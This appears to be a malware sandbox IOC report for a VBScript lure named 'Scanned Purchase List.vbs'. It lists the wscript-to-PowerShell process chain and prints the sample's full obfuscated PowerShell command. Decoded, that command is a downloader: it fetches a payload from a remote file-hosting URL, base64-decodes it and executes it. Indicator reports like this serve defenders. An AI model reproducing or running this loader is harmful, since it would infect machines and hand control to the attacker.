IOC Report
Scanned Purchase List.vbs

Scanned Purchase List.vbs

ASCII text, with very long lines (2199), with CRLF line terminators

initial sample

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA asD.t) su ';$Billaanets=$counterargues;tramelling (doublecrossing ' or$BilGBomLEneoB tbslaaBorlThr:r taPolP InoBo.CKa rIndiFugs riiTemA RaRElsY.al=Bar(T lTsquemars stT.ar-H.aP DraRabTRekHUns Ve $FisbOphIfreLM.nL saa LoAProNslaEsuktValsUni) h ');while (!$Apocrisiary) {tramelling (doublecrossing 'But$kurgAn,lLabo eb omaUnplHay:Rare tuuRovpQuah,oro P r BebKopiUndaMsslMaa=End$PretskorT auAc e ca ') ;tramelling $semicolloquially;tramelling (doublecrossing 'Ejesne tAn a inrHeatCol-BrassamlUnde epeNatpDag Ove4Des ');tramelling (doublecrossing 'Hil$ Img flsk oConbmisaDenlFra:MasA edpEnaoEkscPr,rBesiYo.sCrei Coa Vgr LuyA t=sun(K lTIngeAngsF,etGen- F.PProajawt M,hUrt Uni$sa Bskai VelDefls aaD pa O n oeMu.tG as wh)ste ') ;tramelling (doublecrossing ' W.$ m g KolUddoArab onaAu l re: spEs unNa.est rsikg.isieftmI fnDdsg HjdstueN n=Ord$ TygCollNaroTrubLeuaGullLyd:FalTP,oiTypdA bsA phFo.o scr U,i ResBisoGran.omt Wase b+ Di+fo %Dre$EnhsOmvtAs,yOpdr astEpidDy,yFl.kLyckFale efrUnd..emcManospruFusnDyrtsk, ') ;$Encheson=$styrtdykker[$Energimngde];}$Arthriticine=282118;$sorteringsordenen=30262;tramelling (doublecrossing 'Pl.$WabgCenlslaoLeubFraa jal t : g.Osi.mBets ortGloy U.rProtPseeHyptEpi slv=Bai st G Alesutt.xa-sacC PtoPosnP ntHa.eLu.n cetC.e Br$ .tBen,i amlPral leaBliasarnOldeMontEkss Di ');tramelling (doublecrossing 'sty$salg Auls po ekb abaph lOpe:,arsso.t pioBard CodGene ajrFlikVano PrnspigE ee phnU d Ext=E e mi.[Mi sTepyFlysOlitTaveKipm.ol. emCspyosannFunv HaeAmpr CotOm ]B,g:Beg:VouFD,nr.etoUnwmscrBsc aKapsLuneUpp6Pis4 Hos TwtIntrCh iAfgnraagTer(Kam$EmpOB.omAmbssket piyJu r,ret R eApptAld) sl ');tramelling (doublecrossing 'Fi $,mmgjo l skoPosb O.asunl i:by,NKo,o C tD ma.xmrsc iBoazKomisarnRefgB.a Ma=Euc Unc[ HasD nyTemsBettBiseFlamM k.RomTI seDisxambtBlo.WigEOs nDigcBabo Pad PliAfsnTimgTik],kr:De : slAFars ReCUnuIsamI.ta. H,G .reEsttConsCymtU ora,visa nHoggInf(ye $Fr s ngt A,oBledAardRe e MorInskVagoF,dnMicgAlleCatnall) Re ');tramelling (doublecrossing 'Mya$ eg ypl,kooU sb.oua.hol gn:TreC,ighsweuLancCsuk ,oyse.=Lio$Mi NPasoO.ltBloa C ra si DizAfkiNo n.argskr.AmpsNymu U,b sksGr tTv,rDiviseenmaagFor(T.e$,arA FurstytIndhBelrTiliNontGenis.lc nistyn,tiePha,bin$ ous,eaoKonr T,tMeleKokrHo iLinnEntgTilsshaoBarr MadKroe Ben AceNo n T ) ka ');tramelling $Chucky;"